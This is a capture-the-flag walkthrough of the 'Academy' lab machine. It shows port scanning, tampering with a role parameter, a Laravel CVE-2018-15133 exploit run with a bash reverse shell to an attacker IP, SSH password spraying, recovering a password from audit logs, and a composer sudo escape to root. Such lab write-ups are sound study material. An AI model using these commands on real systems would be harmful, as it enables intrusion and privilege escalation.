Academy
Hi all, the primary purpose of this write-up is to practice scripting skills when possible, and try to be less reliant on already-built tools
Port scanning
IP
10.10.10.215We will start by enumerating the ports on the target machine, to do so, we can write a Python script that will enumerate the ports and perform banner grabbing to identify services running
We can run the following script with the following
python3 Portscanner.py 10.10.10.215 1-1000This script checks ports given in a range
Performs banner grabbing to identify services running on the machine
From what we can tell we have
SSH
webserver running (Apache/2.4.41)
Most likely a Ubuntu server
we can add the hostname "academy.htb" to our hosts file
sudo vi /etc/hosts
to write and quit in the Vim editor
esc
:wqNow we can navigate to the web server
Web Server (Apache)
First thing, we are greeted with a web page with two options
we can check the technologies the web page is using with wappalyzer, you can install it from the following https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
from wappalyzer we can confirm the web page uses PHP and it is indeed a Ubuntu server
with this information we can do some directory busting to find any hidden directories for this we are going to use Feroxbuster, to install feroxbuster install Rust onto our system
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
source $HOME/.cargo/env
cargo install feroxbusterto find hidden directories we can run the following command
feroxbuster -u http://academy.htb -t 5 -L 5 -n -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x phpwe are using seclists to provide our wordlist
we want to add the PHP extension since we now the web page uses php
we found one interesting directory
admin.php
within the login.php common credentials are not successful
Admin:Admin
admin:password
admin:Password123!within the register.php let's register an account and see what access we have
logging in with the user we just created we are greeted with a static page with little to no functionality
Lets catch the web request and see what is being sent to the server when we register an account, instead of using burp or ZAP we are going to catch the request using a tool called mitmproxy where we can use its python API and script our attack
for our proxy we need to set up a few things
we want to install the foxyproxy plugin for our browser https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
once installed in our browser we need to configure the plugin to redirect traffic through our proxy
within foxyproxy click Options -> Add
follow the configurations
we need to install mitm certificate in the terminal run mtimproxy
mitmproxyin our browser activate the mitm configuration in foxyproxy, then head to http://mitm.it/ and download the certificate for your system, for us we want the Linux option
within your browser settings search certificates → certificate manager → import → within your downloads directory click on the certificate from mitm → tick the box “Trust this CA to identify websites"
Now we can activate mitmproxy
mitmproxy --mode regular@8081let's register another user
we will register the user
within the terminal, we will see a POST request from /register.php
We can just click on the request and we can see the parameters being sent to the server
what of real interest is the "roleid" parameter being equal to 0, Now what if we register another account and set "roleid" to be equal to 1
for this, we can write a Python script to automate catching the request and modifying the parameter using mitm's API
mitmproxy -s role_id_changer --mode regular@8081Now lets register a new user
if we look at the recent POST request in our terminal we can see the changes made
we have successfully changed roleid from a 0 to a 1
let's try our new user creds within the admin.php page
we can successfully login in and we are greeted with what looks like a planner
Already we have some juicy details looks like we have some usernames and a subdomain
users
cry0l1t3
mrb3nsubdomain
dev-staging-01.academy.htblet's add the subdomain to our /etc/hosts
navigate to http://dev-staging-01.academy.htb/
looks to be an open-source web application framework called Laravel
from the page, we can see a lot of information showing up
from a quick Google search, we have a good hunch that Laravel is vulnerable to CVE-2018-15133
we can use the following exploit
we can clone the repo into our working directory
sudo git clone https://github.com/aljavier/exploit_laravel_cve-2018-15133.gitcd into the repo and install the requirements.txt
pip3 install -r requirements.txtfor the exploit to work, we need the API_KEY which we found within the Laravel app
In preparation of our reverse shell let's setup a netcat listener
nc -lvnp 9001now for the exploit, we will use a one-liner bash tcp reverse shell
python3 pwn_laravel.py -c "bash -c 'bash -i >&/dev/tcp/10.10.16.4/9001 0>&1'" http://dev-staging-01.academy.htb dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=we have specified the command we want to run on the system (bash reverse shell) the url and API_key
we should have a hit on our netcat listner
Privilege Escalation
In our new shell, we are present as a low-level user
Our next move is to find a way to elevate our privileges, and progressively search our way through if we look at the /var/www/html/academy/ directory we will find a hidden folder .env
ls -al /var/www/html/academywe will find the .env file which at times can contain sensitive material, in our case it does
mySup3rP4s5w0rd!!we found a unique password, next lets search the /etc/passed file to find users on the system
cat /etc/passwd
from what we can see we have multiple users
21y4d
ch4p
cry0l1t3
egre55
g0blin
mrb3nNow that we have a list of users and a password lets script a ssh_password_sprayer
we'll create a file containing our user list and a file containing, once that is done we can run our script as follows
python3 ssh_pass_sprayer.py 10.10.10.215 user.txt passlist.txtWe get a hit for successful creds
cry0l1t3: mySup3rP4s5w0rd!!we can SSH as cry0l1t3
ssh cry0l1t3@10.10.10.215Privilege Escalation as cry0l1t3
from here the user.txt is within the /home/cry0l1t3 directory
lets upgrade our shell
python3 -c "import pty;pty.spawn('/bin/bash')"when we look at the id of our user
we can see our user is part of the group "adm" group, being part of the "adm" group usually members have permission to read log files inside /var/log
lets focus on the /var/log/audit logs for this we can create a simple bash script to search for keywords comm="su" and comm="sudo"
we do need to create this script from our local machine and then transfer it over to Once we have our script ready to go we need to set up a python server for us to grab from our shell
local machine python3 server
python3 -m http.server 8888
from our target machine, we need to cd into the /tmp directory and we will use wget to retrieve the script
cd /tmp && wget http://10.10.16.4:8888/grepper.shwe need to give it execute permissions
chmod +x grepper.shnow we just need to run it
./grepper.shwe do find something interesting in the results
what we have highlighted is a log entry but what we are most interested is the
comm="su": This indicates the command that triggered the event. In this example, the su command was executed.
data=6D7262336E5F41634064336D79210A: This part contains additional data associated with the event, typically in hexadecimal format. The meaning of this data can vary depending on the specific event.
lets convert this hex value to ASCII using python script
we have a possible password
mrb3n_Ac@d3my!let's change our user to mrb3n
su mrb3nwe are now user mrb3n
Privilege Escalation via mrb3n
let's fix our shell
python3 -c "import pty;pty.spawn('/bin/bash')"let's check our current sudo privs
sudo -l
looks like we can use the composer command with sudo privs, if we look at https://gtfobins.github.io/gtfobins/composer/#sudo we can see we can escalate our privileges to root
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script xwe are now root
Last updated